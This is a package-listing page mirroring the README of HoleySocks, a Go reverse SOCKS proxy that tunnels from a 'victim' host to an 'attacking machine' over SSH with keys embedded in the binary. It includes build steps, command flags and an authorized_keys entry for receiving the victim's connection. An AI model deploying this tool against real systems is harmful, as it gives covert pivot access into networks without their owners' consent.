Huge News!Announcing our $40M Series B led by Abstract Ventures.Learn More
Socket
Sign inDemoInstall
Socket
Sign inDemoInstall

github.com/attackgithub/holeysocks

Package Overview
Dependencies
Alerts
File Explorer
Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

github.com/attackgithub/holeysocks

  • v0.0.0-20190205024923-4461749f3df1
  • Source
  • Go
  • Socket score
Version published
Created
Source

HoleySocks

A simple cross-platform reverse socks proxy.

Getting Started

As a module

import github.com/audibleblink/HoleySocks/pkg/holeysocks

func main() {
	//error handling removed for brevity
	config := holeysocks.MainConfig{}
        configBytes, _ := ioutil.OpenFile("ssh.json")
        json.Unmarshal(configBytes, &config)
	
	sshKey, _ := ioutil.OpenFile("id_ed25519")
	config.SSH.SetKey(sshKey)
	
        holeysocks.DarnSocks(config)
	// #DarnSocks runs two goroutines then returns so we have to keep main from returning
	select {}
}

See here for full usage

As a standalone binary

It's possible to embed all the required parameters to start and forward the socks server with SSH so that cli flags are not needed. Do this by creating config/ssh.json and using the -X main.static=1 ldflag.

# needed for embedding configs in the binary
go get -u github.com/gobuffalo/packr/...

go get github.com/audibleblink/HoleySocks/...
cd $GOPATH/src/github.com/audibleblink/HoleySocks

... edit configs/ssh.json ...

make depends
make

To compile a generic binary without embedded configs, remote the -X ldflag from the Makefile or just go build as necessary. You should get a binary that's configurable with these flags:

Usage of binaries/linux/HoleySocks64:
  -sshuser string
        [REQ] SSH user ong the host
  -sshhost string
        [REQ] SSH host with which to connect
  -pkey string
        [REQ] File path for private key
  -rport int
        SSH host port on which to bind the local SOCKS server (default 1080)
  -socksport int
        Bind port of the SOCKS server (default 1080)
  -sshport int
        SSH host destination port (default 22)

Read the Makefile for more options

CAUTION The generated private keys are embedded into the binary to allow for the reverse port forwarding without interaction. Follow the instructions below.

Before running the generated binaries, you'll need a user on your attacking machine for receiving the reverse ssh connection that forwards the socks proxy from the victim.

Once that user has been created, (with a homedir and /bin/false shell), append the generated pubkey in your authorized_keys file on the attacking machine.

Do so with the following prefixes:

# if you're forwarding port 1080
FROM=<victim_ip_or_host> NO-X11-FORWARDING,PERMITOPEN="0.0.0.0:1080" ssh-ed25519 AAAAC3......

The Makefile should generate the needed commands and entry for you when you run make depends

FAQs

Package last updated on 05 Feb 2019

Did you know?

Socket

Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.

Install

Related posts

Malicious npm Packages Inject SSH Backdoors via Typosquatted Libraries

Research

Security News

Malicious npm Packages Inject SSH Backdoors via Typosquatted Libraries

Socket’s threat research team has detected six malicious npm packages typosquatting popular libraries to insert SSH backdoors.

By Kirill Boychenko  -  Nov 22, 2024
SocketSocket SOC 2 Logo

Product

  • Package Alerts
  • Integrations
  • Docs
  • Pricing
  • FAQ
  • Roadmap
  • Changelog

About

Packages

npm

Go

Maven

PyPI

Rubygems

Stay in touch

Get open source security insights delivered straight into your inbox.

  • Terms
  • Privacy
  • Security

Made with ⚡️ by Socket Inc